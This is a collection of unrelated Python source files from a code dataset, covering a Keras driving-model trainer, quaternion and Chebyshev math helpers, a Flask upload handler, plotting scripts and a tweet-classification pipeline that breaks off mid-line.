HIGHER_ANGLE_THRESHOLD:\n continue\n return (image_path, angle)\n\n\n \ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n images = []\n angles = []\n for sample in batch_samples:\n if not os.path.exists(sample[0]):\n print('Image: {} does not exist.'.format(sample[0]))\n continue\n\n image_path, angle = get_one_sample(sample)\n image = cv2.cvtColor(cv2.imread(image_path), cv2.COLOR_BGR2RGB)\n images.append(image)\n angles.append(angle)\n\n # Flip Image\n image_flipped = np.fliplr(image)\n angle_flipped = - angle\n images.append(image_flipped)\n angles.append(angle_flipped)\n\n X_train = np.array(images)\n y_train = np.array(angles)\n yield shuffle(X_train, y_train)\n\n#---------------------------------------\n# Generate Training, Validation and \n# Testing data.\n#--------------------------------------\ntrack1_dir = 'data/track1'\nreversed_track1_dir = 'data/track1_reversed'\nudacity_dir = 'data/udacity'\n\nsamples = []\n\nread_samples_from_csv(track1_dir, samples)\nread_samples_from_csv(reversed_track1_dir, samples)\nread_samples_from_csv(udacity_dir, samples)\n\n\nfrom sklearn.model_selection import train_test_split\ntrain_samples, test_samples = train_test_split(samples, test_size=0.1)\ntrain_samples, validation_samples = train_test_split(train_samples, test_size=0.2)\nprint('Training sample size: 2 x {}'.format(len(train_samples)))\nprint('Validation sample size: 2 x {}'.format(len(validation_samples)))\nprint('Testing sample size: 2 x {}'.format(len(test_samples)))\n\ntrain_generator = generator(train_samples, batch_size=32)\nvalidation_generator = generator(validation_samples, batch_size=32)\ntest_generator = generator(test_samples, batch_size=32)\n\n#-----------------------------------------\n# Model Definition\n#-----------------------------------------\nimport keras\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Conv2D, Lambda, Dropout, Activation, BatchNormalization, Cropping2D\nfrom keras.optimizers import Adam\n\nprint('Keras Version: {}'.format(keras.__version__))\n\nmodel = Sequential()\n# Crop image\nmodel.add(Cropping2D(cropping=((50,20), (0,0)), input_shape=(160, 320, 3)))\nmodel.add(Lambda(lambda x: x/255.0 - 0.5))\n\nmodel.add(Conv2D(filters=24, kernel_size=[5,5], strides=[2,2], padding='valid'))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(Dropout(rate=0.2))\n\nmodel.add(Conv2D(filters=36, kernel_size=[5,5], strides=[2,2], padding='valid'))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(Dropout(rate=0.2))\n\nmodel.add(Conv2D(filters=48, kernel_size=[3,3], strides=[2,2], padding='valid'))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(Dropout(rate=0.2))\n\nmodel.add(Flatten())\nmodel.add(Dense(1024, activation = 'relu'))\nmodel.add(Dense(256, activation = 'relu'))\nmodel.add(Dense(64, activation = 'relu'))\nmodel.add(Dense(1))\n\n\n#------------------------------------\n# Train model\n#------------------------------------\ncheckpointer = ModelCheckpoint(filepath='ckpt/model.hdf5', verbose=1, save_best_only=True)\nadam = Adam(lr=0.001)\n\nmodel.compile(loss='mean_squared_error', optimizer=adam)\nhist = model.fit_generator(\n generator = train_generator,\n steps_per_epoch = math.ceil(len(train_samples) / 32.0),\n 
validation_data = validation_generator,\n validation_steps = math.ceil(len(validation_samples) / 32.0),\n epochs = 20, \n callbacks=[checkpointer],\n)\nprint('Training History: ')\nprint(hist.history)\n\n\n#---------------------------------------\n# Evaluate on test data \n#----------------------------------------\ntest_loss = model.evaluate_generator(\n generator = test_generator, \n steps = math.ceil(len(test_samples) / 32.0),\n)\nprint('Test Loss: ')\nprint(test_loss)\n\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"420019403","text":"\nimport math\nfrom quaternions import Quaternion\n\ndef angle_axis_2_quat(angle, x, y, z) :\n q = Quaternion.from_axis_angle([x, y, z], angle / 180.0 * math.pi)\n return (q.w, q.x, q.y, q.z) \n \n\nif __name__ == \"__main__\" :\n import sys, os, subprocess\n if len(sys.argv) < 2 :\n print(\"Exit. [There is not enough argument. Usage: python quaternion2angleaxis.py path/to/work_position]\")\n exit(1)\n\n print(\"Execution of quaternion2angleaxis.py started.\")\n \n workPos = sys.argv[1]\n if os.path.isdir(workPos) :\n print(\"Detected work position:\", workPos)\n else :\n print(\"Exit. [Work position:\", workPos, \"does not exist.]\")\n exit(1)\n \n\n inputFileName = workPos + \"/input.txt\"\n\n if os.path.exists(inputFileName) :\n print(\"Detected input file: \", inputFileName)\n else :\n print(\"Exit. [Input file:\", inputFileName, \"does not exist.]\")\n exit(1)\n\n\n talkeronHome = None\n angle = None\n x = None\n y = None\n z = None\n \n with open(inputFileName, 'r') as f :\n for line in f :\n lineSplit = line.split(\"\\t\")\n if lineSplit[0].strip() == \"talkeron\" and len(lineSplit) > 1:\n talkeronHome = lineSplit[1].strip() \n if lineSplit[0].strip() == \"angle\" and len(lineSplit) > 1:\n angle = float(lineSplit[1].strip())\n if lineSplit[0].strip() == \"x\" and len(lineSplit) > 1:\n x = float(lineSplit[1].strip())\n if lineSplit[0].strip() == \"y\" and len(lineSplit) > 1:\n y = float(lineSplit[1].strip())\n if lineSplit[0].strip() == \"z\" and len(lineSplit) > 1:\n z = float(lineSplit[1].strip())\n\n if angle is not None :\n print(\"angle: \", angle)\n else :\n print(\"Exit. [Input parameter \\\"angle\\\" is missing or invalid.]\")\n exit(1)\n \n if x is not None :\n print(\"x: \", x)\n else :\n print(\"Exit. [Input parameter \\\"x\\\" is missing or invalid.]\")\n exit(1)\n\n if y is not None :\n print(\"y: \", y)\n else :\n print(\"Exit. [Input parameter \\\"y\\\" is missing or invalid.]\")\n exit(1)\n\n if z is not None :\n print(\"z: \", z)\n else :\n print(\"Exit. 
[Input parameter \\\"z\\\" is missing or invalid.]\")\n exit(1)\n\n resultFileName = workPos + \"/result.txt\"\n \n q = angle_axis_2_quat(angle, x, y, z) \n line = \"quaternion: (%f, %f, %f, %f) \" % (q[0], q[1], q[2], q[3])\n print(line)\n with open(resultFileName, 'w') as f :\n f.write(line)\n\n print(\"Done.\")\n","sub_path":"ext/Actions/Transform/angleaxis2quaternion.py","file_name":"angleaxis2quaternion.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"584517538","text":"import numpy as np\nimport scipy.optimize\nimport scipy.linalg\n\ndef chebnodes(m):\n \"\"\" \n Computes m Chebyshev nodes between -1 and 1.\n \"\"\"\n i = np.array(list(range(1, m+1)))\n return -np.cos(0.5 * np.pi * (2 * i - 1) / m)\n\ndef chebgrid(a, b, m):\n \"\"\" \n Computes num Chebyshev nodes on the interval [a,b].\n \"\"\"\n z = chebnodes(m)\n return (b - a) * 0.5 * (z + 1) + a \n\ndef chebconvert(x, a, b):\n \"\"\"\n Transforms nodes between [a,b] to the interval [-1,1].\n \"\"\"\n return 2. * (x - a) / (b - a) - 1\n\n\ndef chebmatrix(deg, m = None, x = None):\n \"\"\"\n Computes the m-by-(deg+1) matrix with Chebyshev basis functions of degree deg for m Chebyshev nodes.\n \"\"\"\n ## check if a second argument is provided\n assert (m != None or np.sum(x) != None), \"Please provide the number of grid points or an input vector/scalar x!\"\n \n ## check if x values are provided\n if x is None: # default: Chebyshev nodes between -1 and 1 (for interpolation/regression) \n z = chebnodes(m)\n elif isinstance(x, (list, tuple, np.ndarray)): # arbitrary vector (for approximation)\n z, m = x, len(x) \n else: # arbitrary scalar (for approximation)\n z, m = x, 1 \n\n ## define numpy array and fill second column \n T = np.ones((m, deg + 1))\n T[:,1] = z\n \n ## loop over columns in T; each column corresponds to the Chebyshev basis functions for deg col_idx\n for col_idx in range(1, deg):\n T[:,col_idx+1] = 2 * z * T[:,col_idx] - T[:,col_idx - 1]\n return T\n\ndef chebapprox(y, deg, v = None):\n \"\"\"\n Function to compute the Chebyshev coefficients using interpolation or regression\n \"\"\"\n m = len(y)\n T = chebmatrix(deg, m)\n \n if deg == m-1: # interpolation (default)\n coef = np.linalg.solve(T,y)\n else:\n coef = np.ones(deg + 1)\n for idx_deg in range(deg + 1):\n coef[idx_deg] = sum(y * T[:,idx_deg]) / sum(T[:,idx_deg]**2)\n \n return coef ","sub_path":"Lecture6_FunApprox/funapprox_cme.py","file_name":"funapprox_cme.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"481498343","text":"\n\n#calss header\nclass _POSSESS():\n\tdef __init__(self,): \n\t\tself.name = \"POSSESS\"\n\t\tself.definitions = [u'to have or own something, or to have a particular quality: ', u\"(of a wish or an idea) to take control over a person's mind, making that person behave in a very strange way: \"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_possess.py","file_name":"_possess.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"295148521","text":"#!/usr/bin/python3\n\nimport sys\nimport os\nimport re\n\nsrcpath = 
os.path.normpath(os.path.join(os.path.dirname(__file__), os.pardir, \"src\"))\nsys.path.insert(0, srcpath)\n\nif __name__ == \"__main__\":\n from catkin_lint.diagnostics import message_list\n severity = {}\n for curdir, _, files in os.walk(os.path.join(srcpath, \"catkin_lint\")):\n for fn in files:\n if fn.endswith(\".py\"):\n with open(os.path.join(curdir, fn), \"r\") as f:\n for line in f.readlines():\n m = re.search(r'info.report\\((.*?), \"(.*?)\"', line)\n if m:\n if m.group(2) not in severity:\n severity[m.group(2)] = set()\n for s in [\"ERROR\", \"WARNING\", \"NOTICE\"]:\n if s in m.group(1):\n severity[m.group(2)].add(s.lower())\n with open(os.path.join(os.path.dirname(__file__), \"docs\", \"messages.md\"), \"w\") as f:\n f.write(\"\"\"\\\n# catkin_lint diagnostic messages\n\nThis is a list of all messages which might be shown by **catkin_lint**.\nEach problem has a unique ID (such as *catkin_order_violation*),\nwhich you can use to disable certain messages, either with the command line option\n`--ignore ID`, or by adding a pragma line `#catkin_lint: ignore ID` at the beginning\nof the CMakeLists.txt file. As a third option, you can add a pragma line `#catkin_lint: ignore_once ID`\nright before the offending statement. Use this if you want to ignore a particular instance\nof a problem but still be notified if the same problem occurs someplace else. You may\nalso use `#catkin_lint: report ID` at any point to override a previous `ignore`.\n\nSince version 1.5.4, you may also customize the severity with the command line options\n`--error ID`, `--warning ID`, or `--notice ID`. You can also add the pragma line\n`#catkin_lint: skip` in any `if()`, `foreach()`, or `macro()` block, which will instruct\nthe parser to ignore all remaining commands in the block until the `else()`, `endif()`,\n`endforeach()`, or `endmacro()` statement.\n\n\"\"\")\n\n messages = {}\n for key in sorted(message_list.keys()):\n if key not in severity:\n print(\"Warning: unused message '%s'\" % key)\n continue\n short_text, long_text = message_list[key]\n long_text = long_text.replace(\"\\n\", \" \")\n long_text = long_text.replace(\"catkin_lint\", \"**catkin_lint**\")\n short_text = re.sub(r\"%\\((.*?)\\)s\", r\"\\1\", short_text)\n long_text = re.sub(r\"%\\((.*?)\\)s\", r\"\\1\", long_text)\n long_text = re.sub(r\"([a-z_]+\\(.*?\\))\", r\"\\1\", long_text)\n long_text = re.sub(r\" +\", \" \", long_text)\n long_text = long_text.strip()\n short_text = short_text.strip()\n messages[(short_text, key.lower())] = (long_text, \", \".join(sorted(severity[key], key=lambda x: {\"error\": 0, \"warning\": 1, \"notice\": 2}.get(x))))\n for msg, key in sorted(messages.keys()):\n long_text, severities = messages[(msg, key)]\n f.write(\"## %s\\n\\n\" % msg)\n f.write(\"- **ID**: %s\\n\" % key)\n f.write(\"- **Severity**: %s\\n\" % severities)\n f.write(\"- **Explanation**: %s\\n\" % long_text)\n f.write(\"\\n\")\n","sub_path":"gh-pages/mk_messages.py","file_name":"mk_messages.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"42135615","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\n\ndatosIniciales=np.genfromtxt(\"condicionesI.txt\",delimiter=\" \")\ndatosNormalInt1=np.genfromtxt(\"NormalInt1.txt\",delimiter=\" \")\ndatosNormalInt2=np.genfromtxt(\"NormalInt2.txt\",delimiter=\" \")\ndatosNormal=np.genfromtxt(\"Normalfinal.txt\",delimiter=\" 
\")\n\n\ndatosAbiertosInt1=np.genfromtxt(\"AbiertolInt1.txt\",delimiter=\" \")\ndatosAbiertosInt2=np.genfromtxt(\"AbiertoInt2.txt\",delimiter=\" \")\ndatosAbiertosFinal=np.genfromtxt(\"Abiertofinal.txt\",delimiter=\" \")\n\ndatosPeriodicosInt1=np.genfromtxt(\"PeridicolInt1.txt\",delimiter=\" \")\ndatosPeriodicosInt2=np.genfromtxt(\"PeriodicoInt2.txt\",delimiter=\" \")\ndatosPeriodicosFinal=np.genfromtxt(\"Periodicofinal.txt\",delimiter=\" \")\n\n\n\n\nx1=np.linspace(0.,50.,50)\ny1=np.linspace(0.,50.,50)\nX,Y=np.meshgrid(x1,y1)\n\n\n\nfig = plt.figure()\nax1 = fig.add_subplot(2,2,1, projection ='3d')\nax2= fig.add_subplot(2,2,2, projection ='3d')\nax3 = fig.add_subplot(2,2,3, projection ='3d')\nax4 = fig.add_subplot(2,2,4, projection ='3d')\nax1.set_title('Condiciones Inciales')\nax2.set_title('3000 Iteraciones')\nax3.set_title('6500 Iteraciones')\nax4.set_title('Final')\n\nsurf1=ax1.plot_surface(X,Y,datosIniciales,rstride=1,cstride=1, cmap=\"inferno\",edgecolor=\"none\")\nsurf2=ax2.plot_surface(X,Y,datosNormalInt1,rstride=1,cstride=1, cmap=\"inferno\",edgecolor=\"none\")\nsurf3=ax3.plot_surface(X,Y,datosNormalInt2,rstride=1,cstride=1, cmap=\"inferno\")\nsurf4=ax4.plot_surface(X,Y,datosNormal,rstride=1,cstride=1, cmap=\"inferno\")\n\nm = cm.ScalarMappable(cmap=\"inferno\")\nm.set_array(datosIniciales)\n\nplt.colorbar(m)\nfig.savefig(\"Normales.png\")\n\nfig = plt.figure()\nax1 = fig.add_subplot(2,2,1, projection ='3d')\nax2= fig.add_subplot(2,2,2, projection ='3d')\nax3 = fig.add_subplot(2,2,3, projection ='3d')\nax4 = fig.add_subplot(2,2,4, projection ='3d')\nax1.set_title('Condiciones Inciales')\nax2.set_title('3000 Iteraciones')\nax3.set_title('6500 Iteraciones')\nax4.set_title('Final')\n\n\nsurf1=ax1.plot_surface(X,Y,datosIniciales,rstride=1,cstride=1, cmap=\"inferno\",edgecolor=\"none\")\nsurf2=ax2.plot_surface(X,Y,datosAbiertosInt1,rstride=1,cstride=1, cmap=\"inferno\",edgecolor=\"none\")\nsurf3=ax3.plot_surface(X,Y,datosAbiertosInt2,rstride=1,cstride=1, cmap=\"inferno\")\nsurf4=ax4.plot_surface(X,Y,datosAbiertosFinal,rstride=1,cstride=1, cmap=\"inferno\")\n\nm = cm.ScalarMappable(cmap=\"inferno\")\nm.set_array(datosIniciales)\nplt.colorbar(m)\nfig.savefig(\"Abiertas.png\")\n\nfig = plt.figure()\nax1 = fig.add_subplot(2,2,1, projection ='3d')\nax2= fig.add_subplot(2,2,2, projection ='3d')\nax3 = fig.add_subplot(2,2,3, projection ='3d')\nax4 = fig.add_subplot(2,2,4, projection ='3d')\nax1.set_title('Condiciones Inciales')\nax2.set_title('3000 Iteraciones')\nax3.set_title('6500 Iteraciones')\nax4.set_title('Final')\n\n\nsurf1=ax1.plot_surface(X,Y,datosIniciales,rstride=1,cstride=1, cmap=\"inferno\",edgecolor=\"none\")\nsurf2=ax2.plot_surface(X,Y,datosPeriodicosInt1,rstride=1,cstride=1, cmap=\"inferno\",edgecolor=\"none\")\nsurf3=ax3.plot_surface(X,Y,datosPeriodicosInt2,rstride=1,cstride=1, cmap=\"inferno\")\nsurf4=ax4.plot_surface(X,Y,datosPeriodicosFinal,rstride=1,cstride=1, cmap=\"inferno\")\n\nm = cm.ScalarMappable(cmap=\"inferno\")\nm.set_array(datosIniciales)\nplt.colorbar(m)\nfig.savefig(\"Periodicas.png\")\n\n\n\n\n\n\ndatos=np.genfromtxt(\"45.txt\",delimiter=\" \")\n\nplt.figure()\nplt.plot(datos[:2000,0],datos[:2000,1],label=\"45\")\nplt.legend()\nplt.ylim(0,)\nplt.title(\"45 
grados\")\n\nplt.savefig(\"45.png\")\nplt.figure()\nplt.plot(datos[2000:4000,0],datos[2000:4000,1],c=\"b\",label=\"10\")\n\nplt.plot(datos[4000:6000,0],datos[4000:6000,1],c=\"r\",label=\"20\")\nplt.plot(datos[6000:8000,0],datos[6000:8000,1],c=\"g\",label=\"30\")\nplt.plot(datos[8000:10000,0],datos[8000:10000,1],c=\"orange\",label=\"40\")\nplt.plot(datos[10000:12000,0],datos[10000:12000,1],c=\"yellow\",label=\"50\")\nplt.plot(datos[12000:14000,0],datos[12000:14000,1],c=\"brown\",label=\"60\")\nplt.plot(datos[14000:16000,0],datos[14000:16000,1],c=\"gray\",label=\"70\")\nplt.title(\"Varicion de grados\")\nplt.xlim(0.)\nplt.ylim(0,)\nplt.legend()\nplt.savefig(\"variosAngulos.png\")\n\n\n\n\n\n\n\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"647354474","text":"a=[1,2,3,4,5,23,45,1,2,3,5,5]\n\nfor i in a:\n print(i)\n\nb=int(input(\"Enter the number of which 1 occurance to remove\"))\nc=0\nfor i in a:\n if i==b:\n break\n c=c+1 \n\n\ndel a[c]\nprint (\"list after removal of specified number \")\ni=0\nfor i in a:\n print(i)","sub_path":"TM02/List/Handon_8.py","file_name":"Handon_8.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"356696743","text":"# -*- coding=utf-8 -*-\nimport os\nfrom flask import Blueprint, request, render_template\nfrom flask import current_app\nimport json\n\nupload_app = Blueprint(\"upload\", __name__)\n\n@upload_app.route(\"/\", methods=['get', 'post'])\ndef upload():\n if request.method == \"POST\":\n file_storage_list = request.files.getlist(\"file\")\n message = {\"result\":\"\",\"error\":\"\", \"filepath_list\":[]}\n for file_storage in file_storage_list:\n # 获得上传数据长度\n if request.content_length > 300000*1000:\n message['result'] = \"fail\"\n message['error'] = \"上传文件太大\"\n return json.dumps(message)\n # 任何时候,后端都不要相信前端\n # 的数据检测结果,比如上传类型限制,所有必要的检查都须放在\n # 后端进行检测\n if file_storage.content_type not in \\\n current_app.config['ALLOW_UPLOAD_TYPE']:\n message['result'] = \"fail\"\n message['error'] = \"上传文件类型不对\"\n return json.dumps(message)\n\n # 使用新文件名保存\n file_path= os.path.join(get_dir(),\n create_filename(file_storage.filename))\n try:\n file_storage.save(file_path)\n except Exception as e:\n message = {\"result\":\"fail\",\"error\":str(e)}\n return json.dumps(message)\n # [1:]将.static/相对路径转为/static绝对路径\n message['filepath_list'].append(file_path[1:])\n message['result'] = \"success\"\n return json.dumps(message)\n\n return render_template(\"upload/jquery_upload.html\")\n\n@upload_app.route(\"/ckeditor\", methods=['post'])\ndef ckeditor_upload():\n if request.method == \"POST\":\n file_storage = request.files.get(\"upload\")\n message = {\n \"uploaded\": \"0\",\n \"fileName\": \"\",\n \"url\" : \"\",\n \"error\" : {\n \"message\": \"\"\n }\n }\n\n # 获得上传数据长度\n if request.content_length > 300*1000:\n message['uploaded'] = \"0\"\n message['error']['message']= \"上传文件太大\"\n return json.dumps(message)\n # 任何时候,后端都不要相信前端\n # 的数据检测结果,比如上传类型限制,所有必要的检查都须放在\n # 后端进行检测\n if file_storage.content_type not in \\\n current_app.config['ALLOW_UPLOAD_TYPE']:\n message['uploaded'] = \"0\"\n message['error']['message'] = \"上传文件类型不对\"\n return json.dumps(message)\n\n\n file_path= os.path.join(get_dir(),\n create_filename(file_storage.filename))\n try:\n file_storage.save(file_path)\n except Exception as e:\n message = 
{\"uploaded\":\"0\",\"error\":str(e)}\n return json.dumps(message)\n\n message['fileName'] = file_storage.filename\n # [1:]将.static/相对路径转为/static绝对路径\n message['url'] = file_path[1:]\n message['uploaded'] = \"1\"\n return json.dumps(message)\n\n\n@upload_app.route(\"/ckeditor/browser\", methods=['get'])\ndef ckeditor_browser():\n images = []\n for dirpath, dirnames, filenames in os.walk(\"./static/uploads\"):\n for file in filenames:\n images.append(os.path.join(dirpath[1:], file))\n return render_template(\"upload/browser.html\", images=images)\n\n\ndef get_dir():\n '''\n 生成文件存放路径\n :return: 存放文件路径\n '''\n from datetime import date\n # 上传文件存放路径\n base_path = \"./static/uploads/\"\n # 根据上传的日期存放\n d = date.today()\n # 生成存储路径\n path = os.path.join(base_path, str(d.year), str(d.month))\n # try:\n # os.makedirs(path)\n # except:\n # pass\n if not os.path.exists(path):\n os.makedirs(path)\n return path\n\ndef create_filename(filename):\n '''\n 生成随机文件名\n :param filename:\n :return:\n '''\n import uuid\n ext = os.path.splitext(filename)[1]\n new_file_name = str(uuid.uuid4())+ext\n return new_file_name\n","sub_path":"14.第二次代码重构/views/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"58216743","text":"import random\nimport string\nimport unicodedata\n\nfrom flask import request, current_app\n\nfrom flaskr.lib.conf.const import Const\n\n\nclass StrUtil:\n def make_random_str(len):\n return ''.join(random.choices(string.ascii_letters + string.digits + '/', k=len))\n\n def get_safe_config(app, param_name):\n if not param_name:\n return ''\n\n if param_name in app.config:\n return app.config[param_name]\n\n return ''\n\n def get_safe_string(param_value):\n if not param_value:\n return ''\n\n return param_value\n\n def get_safe_edit_mode(session_name, session):\n if not session_name:\n return False\n\n if session_name in session:\n return session[session_name]\n\n return False\n\n def truncate(value, num_bytes):\n while StrUtil.lenb(value) > num_bytes:\n value = value[:-1]\n return value\n\n def lenb(message):\n # 文字列長カウント用の変数を定義\n text_length = 0\n # 文章中の文字数分ループを回す\n for i in message:\n c = unicodedata.east_asian_width(i)\n # 半角\n if c == 'H' or c == 'Na':\n text_length = text_length + 1\n # 全角\n elif c == 'F' or c == 'A' or c == 'W':\n text_length = text_length + 3\n # 半角\n else:\n text_length = text_length + 1\n return text_length\n\n @staticmethod\n def get_ip_addr():\n remote_addr = StrUtil.get_safe_config(current_app, 'LOCAL_REMOTE_ADDR')\n if not remote_addr:\n # define your own set\n trusted_proxies = {'127.0.0.1'}\n route = request.access_route + [request.remote_addr]\n remote_addr = next((addr for addr in reversed(route)\n if addr not in trusted_proxies), request.remote_addr)\n StrUtil.print_debug(\"======================remote_addr:{}=========================\".format(remote_addr))\n return remote_addr\n\n def print_debug(msg):\n is_debug_mode = StrUtil.get_safe_config(current_app, 'DEBUG')\n if is_debug_mode:\n current_app.logger.debug(Const.DEBUG_MSG_FORMAT.format(msg))\n\n def print_error(err_msg, exc_info=True):\n current_app.logger.error(Const.ERROR_MSG_FORMAT.format(err_msg), exc_info=exc_info)\n","sub_path":"svcdb/flaskr/lib/svcdb_lib/str_util.py","file_name":"str_util.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"400860098","text":"import pandas as 
pd\nimport numpy as np\nimport re\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\nimport warnings\nfrom wordcloud import STOPWORDS\nimport operator\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\npd.set_option('display.max_columns', 10)\n\ntrain = pd.read_csv('train.csv', index_col='id')\ntest = pd.read_csv('test.csv', index_col='id')\nfor df in [train, test]:\n \n df.drop(columns=['keyword', 'location'], inplace=True)\n \n text=\"@Kiwi_Karyn Check out what's in my parking lot!! He said that until last year it was an ambulance in St Johns. http://t.co/hPvOdUD7iP\"\n text1=\"Check out what's in my parking lot He said that until last year it was an ambulance in St Johns\"\n \n #number of characters\n df['NumChar'] = df['text'].apply(len)\n \n #to lower\n df['text'] = df['text'].apply(lambda x: x.lower())\n \n #count links\n df['Links'] = df['text'].apply(lambda x: len(re.findall(r\"http://\", x)))\n \n #del links\n df['text'] = df['text'].apply(lambda x: re.sub(r\"https*://\\S+\",\"\", x))\n \n #count @\n df['Mentions'] = df['text'].apply(lambda x: len(re.findall(r\"@\", x)))\n \n #count #\n df['Hashtags'] = df['text'].apply(lambda x: len(re.findall(r\"#\", x)))\n \n #del @#\n df['text'] = df['text'].apply(lambda x: re.sub(r\"[@#]\",\"\", x))\n \n #count punctuation\n df['Punct'] = df['text'].apply(lambda x: len(re.findall(r\"[!#$%&'()*+,-./:;<=>?@[\\]^_`{|}~]\", x)))\n \n #remove punctuation\n df['text'] = df['text'].apply(lambda x: re.sub(r\"[!#$%&()*+,-./:;<=>?@[\\]^_{|}~]\",\" \", x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"' | '|^'|'$\", \" \", x))\n \n #del lots of spaces\n df['text'] = df['text'].apply(lambda x: re.sub(r\"\\s{2,}\",\" \", x))\n \n #word count\n df['WordCount'] = df['text'].apply(lambda x: len(re.split(r\" \", x)))\n \n #average word lenght\n df['WordLenght'] = df['text'].apply(lambda x: round(np.mean([len(w) for w in str(x).split()]), 1))\n \n #number of stopwords\n df['StopWordsCount'] = df['text'].apply(lambda x: len([w for w in str(x).lower().split() if w in STOPWORDS]))\n \n text2=\"Big Top Burning The True Story Of An Arsonist A Missing Girl ‰Û \"\n \n #delete special characters\n df['text'] = df['text'].apply(lambda x: re.sub(r\"[^a-z ']\", '', x))\n\n #expand abbreviations\n df['text'] = df['text'].apply(lambda x: re.sub(r\"'s\", ' is', x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"'ve\", ' have', x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"'m\", ' am', x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"n't\", 'n not', x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"'re\", ' are', x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"'d\", ' would', x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"'ll\", ' will', x))\n\n\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\n\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(train['text'])\n\nMAXLEN=100\n\ntrain_sequences = tokenizer.texts_to_sequences(train['text'])\ntrain_data = pad_sequences(train_sequences, maxlen=MAXLEN)\n\ntest_sequences = tokenizer.texts_to_sequences(test['text'])\ntest_data = pad_sequences(test_sequences, maxlen=100)\n\nword_index=tokenizer.word_index\nprint('Number of unique words:',len(word_index))\n\nembeddings_index = dict()\n\nGLOVE_DIM=200\nf = open('embeddings/glove.twitter.27B.200d.txt', encoding=\"utf8\")\n\nfor line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = 
coefs\nf.close()\n\nnum_words=len(word_index)+1\n\n\nembedding_matrix = np.zeros((num_words, GLOVE_DIM))\n\nfor word, index in tokenizer.word_index.items():\n if index > num_words - 1:\n break\n else:\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[index] = embedding_vector\n \n \ndef build_vocab(X):\n \n tweets = X.apply(lambda s: s.split()).values \n vocab = {}\n for tweet in tweets:\n for word in tweet:\n try:\n vocab[word] += 1\n except KeyError:\n vocab[word] = 1 \n return vocab\n\ndef check_embeddings_coverage(X, embeddings):\n \n vocab = build_vocab(X) \n covered = {}\n oov = {} \n n_covered = 0\n n_oov = 0\n for word in vocab:\n try:\n covered[word] = embeddings[word]\n n_covered += vocab[word]\n except:\n oov[word] = vocab[word]\n n_oov += vocab[word]\n vocab_coverage = len(covered) / len(vocab)\n text_coverage = (n_covered / (n_covered + n_oov))\n sorted_oov = sorted(oov.items(), key=operator.itemgetter(1))[::-1]\n return sorted_oov, vocab_coverage, text_coverage\n\n\ntrain_glove_oov, train_glove_vocab_coverage, train_glove_text_coverage = check_embeddings_coverage(train['text'], embeddings_index)\ntest_glove_oov, test_glove_vocab_coverage,test_glove_text_coverage = check_embeddings_coverage(test['text'], embeddings_index)\nprint('GloVe Embeddings cover {:.2%} of vocabulary and {:.2%} of text in Training Set'.format(train_glove_vocab_coverage, train_glove_text_coverage))\nprint('GloVe Embeddings cover {:.2%} of vocabulary and {:.2%} of text in Test Set'.format(test_glove_vocab_coverage, test_glove_text_coverage))\n\n#print(test_glove_oov)\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Conv1D, MaxPooling1D, SpatialDropout1D\nfrom keras.layers import Dropout, Bidirectional, Activation\nfrom keras.layers import GlobalMaxPooling1D, GlobalAveragePooling1D\nfrom keras.layers.embeddings import Embedding\n\nmodel = Sequential()\nmodel.add(Embedding(num_words, GLOVE_DIM, input_length=100, weights=[embedding_matrix],\n trainable=False))\nmodel.add(Dropout(0.2))\nmodel.add(Conv1D(64, 5, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=4))\nmodel.add(LSTM(300))\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.compile(loss='binary_crossentropy', optimizer='adam', 